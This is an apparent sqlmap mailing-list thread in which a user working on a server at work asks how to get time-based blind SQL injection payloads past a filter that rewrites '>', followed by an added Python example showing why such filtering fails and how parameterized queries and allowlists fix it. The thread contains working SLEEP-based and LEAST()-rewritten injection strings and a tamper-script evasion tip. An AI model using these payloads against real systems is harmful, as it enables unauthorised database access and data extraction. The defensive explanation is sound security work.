Ah, I didn't try that one before. That did the trick, thanks! :-)

On 2013-06-03 09:35, Dennis wrote:
> Haven't tried, but if it's just for the '>' character, you might wanna
> try '--tamper=between'. That should get rid of the '>' character in the
> payloads.
>
> Cheers
> Dennis
>
>
> On 01.06.2013 22:39, d...@alcor.se wrote:
>> Just to add a bit to this, I tried something else that I got to work.
>> I changed the sqlmap payload by using LEAST(), which became this:
>>
>> ',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('
>>
>> Is this something sqlmap can currently do?
>> Or maybe there's a better solution for it?
>> Or should I implement it? (never looked at the sqlmap code, but might
>> be fun to start digging into).
>>
>> Cheers for now!
>>
>>
>> On 2013-06-01 21:57, d...@alcor.se wrote:
>>> Hey guys, I have a server at work where there's an SQLi in an INSERT,
>>> but I can't prove that it's actually a threat so far due to a little
>>> "filter" that replaces some input characters.
>>> I crafted a little injection that injects a sleep into the insert, and
>>> makes it sleep for 10 seconds, and then doesn't insert anything (due to
>>> a duplicate error that I made sure to get).
>>>
>>> The original query looks like this:
>>>
>>> insert into discount_phone_registry (phone_nbr,reg_date) values ('111',date(now()));
>>> And the injection is in the phone_nbr, so I made the following
>>> injection: 111',(SLEEP(10))),('111
>>> And it then becomes: insert into discount_phone_registry
>>> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
>>> So, so far so good, right?
>>>
>>> Well when I wanted to use sqlmap, I noticed that our filter is doing
>>> some stupid things ^^
>>> This is the payload from sqlmap
>>>
>>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>>>
>>> But as it gets submitted in the form, it becomes
>>>
>>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>>>
>>> Notice how the > became a _
>>> The tampering scripts I'm using are space2comment and charencode, and
>>> charencode actually seems to trick it, since I'm getting the less/greater
>>> char in the error output from the web server now.
>>> If I copy/paste the payload directly from the web server error output,
>>> directly into the MySQL client and run it, it works.
>>>
>>> Is there anything else I can try to get this to work?
>>>
>>> PS: If it helps I just noticed this!
>>>
>>> 1064 - You have an error in your SQL syntax; check the manual that
>>> corresponds to your MySQL server version for the right syntax to use
>>> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
>>> insert into discount_phone_registry (phone_nbr,reg_date) values
>>> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>>>
>>> Notice how it complains on ";16" which is probably the encoded > sign
>>> (>).
>>>
>>> Thanks in advance! :-)
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>>> It's a free troubleshooting tool designed for production
>>> Get down to code-level detail for bottlenecks, with <2% overhead.
>>> Download for free and get started troubleshooting in minutes.
>>> http://p.sf.net/sfu/appdyn_d2d_ap2
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
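The thread's lesson for the application side is that a character-replacement "filter" (here `>` becoming `_`) is not a defence: the same comparison can be written without the blocked character (LEAST(), BETWEEN), and the single quote and comma that actually break out of the string literal are never touched. The script below is an added example and is not code from the thread, from sqlmap or from the poster's application. It assumes the filter replaces only `>` with `_`, uses shortened payload strings modelled on the thread's, and stands in an in-memory SQLite table for the MySQL table `discount_phone_registry` so it runs offline. It contrasts the filtered string-concatenated INSERT with a parameterized INSERT plus allowlist validation, which is the fix a defender would want.

```python
import re
import sqlite3

# Constructed inputs modelled on the thread's payloads (shortened, no /**/ or
# IFNULL/CAST wrapping). The first needs '>', the second rewrites the
# comparison with LEAST() and contains no '>' at all.
PAYLOAD_GT = "111',(SELECT 1 AND 9457=IF((ORD(MID(CURRENT_USER(),1,1))>16),SLEEP(5),9457)),('"
PAYLOAD_LEAST = "111',(SELECT 1 AND 9457=IF((LEAST(ORD(MID(CURRENT_USER(),1,1)),16)=16),SLEEP(5),9457)),('"


def naive_filter(value: str) -> str:
    """Assumed behaviour of the 'filter' in the thread: rewrite '>' to '_'
    and leave every other character (quote, comma, parentheses) alone."""
    return value.replace(">", "_")


def build_query_unsafe(phone_nbr: str) -> str:
    """The vulnerable pattern: the filtered value is concatenated straight into
    the INSERT statement, exactly as the thread shows the application doing."""
    return (
        "insert into discount_phone_registry (phone_nbr,reg_date) values ('"
        + naive_filter(phone_nbr)
        + "',date(now()))"
    )


def values_tuple_count(query: str) -> int:
    """Count VALUES tuples in the built statement. Anything above 1 means the
    input escaped the string literal, whether or not '>' survived."""
    return query.count("),(") + 1


def is_valid_phone_nbr(value: str) -> bool:
    """Allowlist validation: a phone number for this table is 3-15 digits
    (assumed policy). Rejecting everything else beats trying to strip
    'dangerous' characters one at a time."""
    return re.fullmatch(r"\d{3,15}", value) is not None


def store_parameterized(phone_nbr: str) -> list:
    """Parameterized INSERT: the bound value is one string no matter what it
    contains, so it is stored verbatim and never parsed as SQL. SQLite in
    memory stands in for the MySQL table; date('now') is SQLite's spelling
    of the thread's date(now())."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table discount_phone_registry (phone_nbr text primary key, reg_date text)"
    )
    conn.execute(
        "insert into discount_phone_registry (phone_nbr, reg_date) values (?, date('now'))",
        (phone_nbr,),
    )
    rows = conn.execute("select phone_nbr from discount_phone_registry").fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    for label, payload in (("with >", PAYLOAD_GT), ("with LEAST()", PAYLOAD_LEAST)):
        q = build_query_unsafe(payload)
        print(f"{label}: filter changed input: {naive_filter(payload) != payload}, "
              f"VALUES tuples after concatenation: {values_tuple_count(q)}")
    print("allowlist accepts '111':", is_valid_phone_nbr("111"))
    print("allowlist accepts LEAST payload:", is_valid_phone_nbr(PAYLOAD_LEAST))
    print("parameterized store of LEAST payload:", store_parameterized(PAYLOAD_LEAST))
```

Running it shows the filter altering the `>` payload yet leaving the LEAST() payload byte-for-byte intact, both payloads producing a two-tuple INSERT when concatenated, the allowlist rejecting both, and the parameterized insert storing the payload as a single opaque string in one row.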